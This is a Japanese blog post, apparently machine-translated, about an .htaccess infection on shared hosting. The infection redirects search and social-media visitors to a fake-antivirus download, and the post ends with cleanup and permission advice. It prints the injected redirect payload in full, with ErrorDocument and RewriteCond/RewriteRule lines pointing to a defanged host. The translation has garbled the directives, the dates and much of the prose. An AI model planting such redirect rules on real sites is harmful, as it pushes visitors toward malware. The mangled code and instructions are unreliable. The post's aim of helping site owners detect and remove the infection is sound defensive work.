ウイルスの新しい形 私は、ずっと上のホストされているサイトには影響を与え知りませ参照します 安全でないサーバ ユーザーアカウント/サブドメインアカウントは、それらの間で「見る」ことができます。 具体的には、ホスティングアカウントはすべてフォルダ "に配置されますバーチャルホスト「、そしての書き込み権 ユーザーフォルダ 「vhosts」の数は、ほとんどの状況で再販業者によって一般ユーザーに提供されます。 これは、を使用しないWebサーバーの一般的な方法です。 WHM / cPanelの.
キュプリン
.Htaccessウイルスアクション-.htaccessハック
ウイルス ファイルに影響 .htaccess 被害者のサイト。 行が追加されます/ 指令 へ 訪問者をリダイレクトします (yahoo、msn、google、facebook、yaindex、twitter、myspaceなどのトラフィックの多いサイトやポータルから)「アンチウイルス「。 それは 偽のアンチウイルスソリューション、私はに冒頭で書いた 偽アンチウイルスリムーバー.
これはどのようにある .htaccess 影響を受けた:(次の行では、コンテンツのURLにアクセスできない)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngineをオンにする
のRewriteCond%{HTTP_REFERER}。* Yandexの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Odnoklassniki。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Vkontakte。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ランブラー。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*チューブ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ウィキペディア。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ブロガー。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*百度。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Qq.com。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Myspaceの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Twitterの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Facebookの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*グーグル。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ライブ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* AOLの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ビンビン。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* MSN。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*アマゾン。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*イーベイ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* LinkedInの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Flickrの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*はLiveJasmin。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*曹操。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ダブルクリック。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Pornhub。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Orkutの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* LiveJournalの。* $ [NC、OR]
RewriteCond%{HTTP_REFERER}。*wordpress。*$[NC、OR]
のRewriteCond%{HTTP_REFERER}。*ヤフー。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*確認して下さい。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*エキサイト。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*アルタビスタ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* MSN。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ネットスケープ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ホットボット。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*後藤。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*インフォシーク。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*マンマ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Alltheweb。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ライコス。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*検索。* $ [NC、OR]
RewriteCond %{HTTP_REFERER} .*メタックrawler.*$ [ノースカロライナ州、オレゴン州]
するRewriteCond%{HTTP_REFERER}。*メール。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Dogpileの。* $ [NC]RewriteCond%{HTTP_USER_AGENT} *Windows.*
RewriteRule。* Hxxp://wwww.peoriavascularsurgery.com/main.php?H =%{HTTP_HOST}&i = J8iiidsar / qmiRj7V8NOyJoXpA ==&e = r [R、L]REQUEST_FILENAMEするRewriteCond%{}!-f
REQUEST_FILENAMEするRewriteCond%{}!-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond%{HTTP_USER_AGENT} *Windows.*
RewriteRule。* Hxxp://wwww.peoriavascularsurgery.com/main.php?H =%{HTTP_HOST}&i = J8iiidsar / qmiRj7V8NOyJoXpA ==&e = 4 [R、L]
使う人 WordPress これらの行はファイル内にあります .htaccess から public_htmlの。 また、ウイルスは、フォルダ、同一の.htaccessファイルを作成します。 WP-コンテンツ.
*代わりに表示される状況もありますpeoriavascularsurgery.com dns.thesoulfoodcafe.com または他のアドレス。
何がこのウイルスになります。
リダイレクトされると、訪問者は、メッセージによって両手を広げて迎えされています。
警告!
お使いのコンピューターには、ウイルスやマルウェアプログラムの存在のさまざまな兆候が含まれています。 君の system すぐにアンチウイルスチェックが必要です!
System セキュリティは、ウイルスや悪意のあるプログラムについてPCの迅速かつ無料のスキャンを実行します。
どのボタンを押しても、「」ページに移動します。[マイコンピュータ]"、模倣するために作成されました XPのデザイン。 ここで「スキャンプロセス」が自動的に開始され、最後に「感染している」ことがわかります。
[OK]をクリックするか、キャンセルした後、開始されます ダウンロードアキファイル setup.exeを。 この setup.exeが偽のアンチウイルスです システムに影響を与える。 あなたはさらにリンクがウイルスを伝播するためにいくつかのマルウェアをインストールし、これら以外に アンチウィルスソフトウェア (また偽物)被害者が購入するように招待されていること。
すでにウイルスに接触した者は、このフォームを使用することができます 偽アンチウイルスリムーバー。 また、HDD全体をスキャンすることをお勧めします。 推薦する カスペルスキーインターネットセキュリティ または カスペルスキーアンチウイルス.
このタイプのウイルスは、旅行者のOSオペレーティング·システムに影響 Windows XP、 Windows ME Windows 2000、 Windows NT、 Windows 98 si Windows 95。 これまでのところ、オペレーティングシステムの既知の感染事例はありません。 Windows 視力はい Windows 7.
どのように我々はサーバ上でこのウイルスhtaccessファイルを削除することができ、かつ感染を防ぐ方法。
1. 疑わしいファイル、消去コードを分析します。 ファイルのみに影響されないことを確認するには .htaccess 良いです すべてのファイルを分析する 。PHPの si 。Jsの.
2。 ファイルを書き換えhtaccessファイルと私はセット chmod 644 または 744 書き込みアクセスを持つ唯一の ユーザ所有者.
3。 あなたは、フォルダ内のウェブサイトのホスティングアカウントを作成するとき /ホーム または ウェブルート/ これは、自動的に多くの場合、ユーザーの名前を持つフォルダが作成されます(cPanelの、FTPのユーザー、等)。 一人のユーザーから別のデータを書き込むと、送信ウイルスを防ぐためには、各ユーザーのフォルダを設定することをお勧めします。
chmod 644 または 744、755 ~ 644 が表示されます。
chown -R ユーザー名 folder_name.
chgrpコマンド-R nume_user nume_folder
LS-すべて それらが正しく行われたかどうかを確認する方法。 このようなものが表示されるはずです:
drwx – x – x 12 dinamics dinamics 4096 May 6 14:51 dinamics /
drwx – x – x 10 duran duran 4096 Mar 7 07:46 duran /
drwx – x – x12テストチューブテストチューブ4096Jan 29:11テストチューブ/
drwxr-xr-x14エクスプレスエクスプレス4096 26年2009月XNUMX日エクスプレス/
drwxr-xr-x 9 ezo ezo 4096 May 19 01:09 ezo /
drwx – x – x9ファーマファーマ4096月19日22:29ファーマ/
上記の一つはuserele FTPになる場合 感染ファイルこれは、別のユーザーのホストにウイルスを送信することはできません。 これは、Webサーバー上でホストのアカウントを保護するための最低限のセーフティネットである。
このタイプのウイルスによって被害を受けた地域の共通の要素。
影響を受けるすべてのドメインは、ドメイン名「/」を含むサイトに訪問者をリダイレクトしますmain.php?s = 4&H"
この "ウイルス。htaccessファイル」はあらゆるタイプのCMSに影響します(Joomla、 WordPress、phpBBなど)を使用してその .htaccess.
.htaccessウイルスのハッキングとリダイレクト.
